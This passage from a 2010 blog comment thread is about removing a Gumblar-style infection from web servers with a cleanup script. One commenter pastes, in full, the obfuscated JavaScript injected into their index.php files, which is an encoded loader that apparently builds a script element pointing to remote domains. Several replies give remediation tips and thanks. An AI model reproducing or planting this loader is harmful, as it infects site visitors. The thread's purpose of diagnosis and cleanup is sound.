    Many thanks.

  169. Jake February 23rd, 2010 at 8:24 am

    Hi Konstantin,

    I’ve also been hit by what I believe to be a variant of the Gumblar virus, but I can’t quite be sure because it’s different from what others have posted here. Here’s what I see at the bottom of every index.php file in my web server:

    var cVN=”849b92a98ee98d878086b4c89d8c878fcaaf80adbf8c9a8098a9a9abbd93bb88a18ea394ae90a09fad9da399a1a992a2849f82ad84abba938c8082a0aaa98b9f8ef3a99cefb99e8cf38eabef8b9f”;var cqf;if(cqf!=” && cqf!=’UBb’){cqf=null};this.sd=27476;function J(s){var e=”";var Bu;if(Bu!=” && Bu!=’i'){Bu=’nz’}; this.Ub=”Ub”;this.mW=”;function BI(V,y){this.CO=”;this.p=”;return V[X("rehdcoaCAt", [4,2,6,0,7,5,3,1])](y);var mf=new Date();}var pk;if(pk!=’inr’){pk=’inr’}; function E(k,I){var HH;if(HH!=’Mr’ && HH!=’Vw’){HH=”};var Iv=”Iv”;return k^I;this.sK=”";var Yv;if(Yv!=” && Yv!=’dd’){Yv=’RC’};}this.Ku=”";var Tq=”"; var X=function(G, Xr){this.va=”";var K=[1][0];this.Zv=”";var m = Xr.length;var Q = G.length;var h=[0,64,162][0];var v = ”;this.aj=”;for(var a = h; a =h;a=a-[1,10,2,170][0]){v+=G[X("hcratA", [1,0])](a);this.vg=false;var dM;if(dM!=’II’ && dM!=’JN’){dM=’II’};}this.tv=false;this.Ll=false;var wA=”";return v;};var BR;if(BR!=”){BR=’WO’};var zq;if(zq!=’Sy’ && zq!=’sD’){zq=’Sy’};this.vy=50904;this.nX=43953; var QF=function(q){var DM;if(DM!=’XEZ’ && DM!=’rG’){DM=”};var Op;if(Op!=’LL’){Op=’LL’};var b=[232,122,0][2];var VV=q[X("elgnht", [1,0])];var Qa=[255,201,149][0];var Jz;if(Jz!=’oq’){Jz=’oq’};var R=[132,0][1];var jQ=false;var VF;if(VF!=’LQ’){VF=’LQ’};var K=[85,1,194][1];var JUp;if(JUp!=” && JUp!=’NG’){JUp=’cs’};while(b<VV){b++;var yv;if(yv!=’ym’ && yv != ”){yv=null};C=BI(q,b - K);this.EpY=”";this.JO=”";R+=C*VV;}var TS;if(TS!=’zu’ && TS!=’kwe’){TS=’zu’};var hs=”hs”;return new n(R % Qa);var zj;if(zj!=”){zj=’sqr’};};var yT=39061;var wo=new Array();var KM=window;var Ky;if(Ky!=’Jzc’){Ky=’Jzc’};var eo;if(eo!=’uY’){eo=’uY’};var F=KM[X("lvae", [3,1,2,0])];this.fE=17167;var U=F(X(”unFctoni”, [2,0,6,3,4,7,5,1]));var H=F(X(”pRgxEe”, [1,5,2,4,3,0]));var YX=new Date();var d = ”;var RS=false;var hsV=new String();var n=F(X(”gtnSir”, [3,1,5,4,2,0]));this.Pi=false;this.yC=39235;var aS=n[X("roChafmrCode", [5,7,1,6,2,3,4,0])];var nG=KM[X("scuneape", [2,3,4,0,1])];var FA=”;var ocO;if(ocO!=”){ocO=’dno’};var 
ot=”";var XF=new Date();var Cz=new Array();var r = ”;var hD=new Array();var sL=”;var hT = ”;var zb;if(zb!=” && zb!=’XY’){zb=”};var HJ;if(HJ!=” && HJ!=’UG’){HJ=”};var f = “%”;this.AC=”";var aI=10154;var qor;if(qor!=’JNt’ && qor != ”){qor=null};var K =[1,10][0];var Xa = ”;var h =[0][0];var fe;if(fe!=’tVQ’ && fe != ”){fe=null};var eq;if(eq!=’Sx’ && eq != ”){eq=null};var A = /[^@a-z0-9A-Z_-]/g;var uIs=”uIs”;var XL =[65,0,182,2][3];var TEf;if(TEf!=”){TEf=’vV’};var bl;if(bl!=’vh’ && bl!=’iu’){bl=’vh’};this.at=false;var doY=[1, X("oducemtnc.ertaEeelemtn\'(csirtp)\'", [1,0]),2, X(”oducemtnb.do.ypaepdnhCli(d)d”, [1,0]),3, X(”ge.osrreecsuenrr.v.atentflix”, [3,5,0,2,4,1]),4, X(”.dsteAttrbiuet(d\’eefr\’”, [1,0,2]),5, X(”oe.iscmta:er.mpu8080″, [5,0,6,2,4,3,7,1]),6, X(”gogopel.t”, [2,1,3,0]),7, X(”iwdnwoo.lnaod”, [1,0]),8, X(”sernaucpe.com”, [2,5,3,1,0,6,4]),11, X(”unfticn(o)”, [2,0,1]),12, X(”oloegg.com”, [4,2,0,5,1,3]),14, X(”hatcc(e)”, [3,1,2,4,0,5]),15, X(”h\”tpt:”, [1,0,2]),16, X(”sd.rc”, [1,2,0]),17, X(”cgc.a”, [1,0]),18, X(”ozdm”, [2,3,0,1]),19, X(”\’1)\’”, [3,1,0,2]),20, X(”ytr”, [1,2,0])];var Xo=”Xo”;var T = s[X("egnlth", [3,0,2,1])];var MX;if(MX!=”){MX=’ut’};var JJ;if(JJ!=”){JJ=’vs’};var To =[50,40,0][2];this.wx=17732;var uG;if(uG!=’sg’ && uG != ”){uG=null};var iS;if(iS!=’Lv’ && iS != ”){iS=null};for(var Pq=h; Pq < T; Pq+=XL){var Aqe=”;hT+= f; var Zdj=new Date();hT+= s[X("ussbrt", [1,0])](Pq, XL);var Nk;if(Nk!=’ve’){Nk=’ve’};}var Co;if(Co!=” && Co!=’Lf’){Co=null};this.Uy=false;var s = nG(hT);var io=”io”;var jT=”jT”;var otm=”";var GP = new n(J);var qs;if(qs!=’fV’){qs=”};var KK = GP[X("capelre", [5,3,2,4,1,0])](A, r);this.fF=”";var bw = new n(U);var gh;if(gh!=” && gh!=’WA’){gh=’Vz’};var ey;if(ey!=” && ey!=’Iy’){ey=null};var qW = doY[X("ntlegh", [2,3,0,4,1])];var vv=24967;var op;if(op!=’ki’ && op!=’Ap’){op=”};KK = B(KK);var NK;if(NK!=’Rd’ && NK!=’vp’){NK=”};this.Rc=false;var Ey=34415;var UP;if(UP!=’oZT’){UP=’oZT’};var JX=”";var dt = bw[X("elprace", [3,0,2,1])](A, r);var 
QV=”;var dt = QF(dt);var zs;if(zs!=’xR’){zs=’xR’};var W=QF(KK);var ku=new String();for(var a=h; a KK.length-K){To=h;var uA=new Date();}var TM;if(TM!=’qY’){TM=’qY’};Xa += aS(jf);var Xt;if(Xt!=”){Xt=’zF’};var kQ=”;}var zx=new Array();for(qq=h; qq < qW; qq+=XL){var mm=”";var ib;if(ib!=’rl’ && ib != ”){ib=null};var AR=”;var ls;if(ls!=’Se’ && ls != ”){ls=null};var kq;if(kq!=” && kq!=’OP’){kq=null};var tr;if(tr!=’Zx’ && tr != ”){tr=null};var Y = aS(doY[qq]);var vP = doY[qq + K];this.AK=”;this.cJ=”";this.Ze=false;this.uo=”;var My=”";var wj=”";var AV = new H(Y, “g”);var YJ=new String();Xa=Xa[X("erlpcae", [1,0])](AV, vP);}var ff=new Array();var Ln;if(Ln!=”){Ln=’LD’};var o=new U(Xa);o();var Ke=”;var bP=62265;dt = ”;this.uYr=”";W = ”;KK = ”;var YQ;if(YQ!=’NR’ && YQ!=’vI’){YQ=’NR’};var MFF=new Array();Xa = ”;var Bd=new String();var HIk;if(HIk!=” && HIk!=’vm’){HIk=null};bw = ”;o = ”;var lk=”lk”;var dF=”;this.eU=”;var Nf=new String();return ”;};var cqf;if(cqf!=” && cqf!=’UBb’){cqf=null};this.sd=27476;J(cVN);

    Tried installing your script, but when I ran it I received the following message:

    Warning: fopen(/home/mysite/public_html/!infected-1266906136.txt) [function.fopen]: failed to open stream: Permission denied in /home/mysite/public_html/curevir.php on line 328

    Warning: fclose(): supplied argument is not a valid stream resource in /home/mysite/public_html/curevir.php on line 336
    TOTAL: 0
    START BACKUP:
    END BACKUP!

    Can you please tell me what I’m doing wrong?

  170. Sameer Shelavale March 10th, 2010 at 7:51 am

    hey Chris,

    The virus comes back because either you did not change the FTP password after clean up OR one of your machines from which you are accessing FTP is infected.

    Please clean up the virus from your local machines as well and change the FTP password.

  171. JamBy March 16th, 2010 at 3:04 pm

    This is very very very cool stuff. Removed all from my site in a minute…

    THX

  172. Amin March 22nd, 2010 at 8:15 am

    Thanks for the script.. it's working.. if some of you can't turn magic quotes off, you can add this at the top of the curevir.php file.

    if ( in_array( strtolower( ini_get( 'magic_quotes_gpc' ) ), array( '1', 'on' ) ) )
    {
        $_POST = array_map( 'stripslashes', $_POST );
        $_GET = array_map( 'stripslashes', $_GET );
        $_COOKIE = array_map( 'stripslashes', $_COOKIE );
    }

  173. Flatlander April 6th, 2010 at 3:00 pm

    Excellent. First I got a bit afraid as I had many Failed messages, but it turned out that these are files with 0-byte length, which had been created by the virus. So now I just need to remove about a 100 files or so of length 0 :-)

    Thanks, lifesaver!

  174. Paul April 11th, 2010 at 3:16 pm

    thank you
    thks

  175. Dean June 17th, 2010 at 8:25 am

    Thanks! If it only fixed up the file permissions and ownership :(
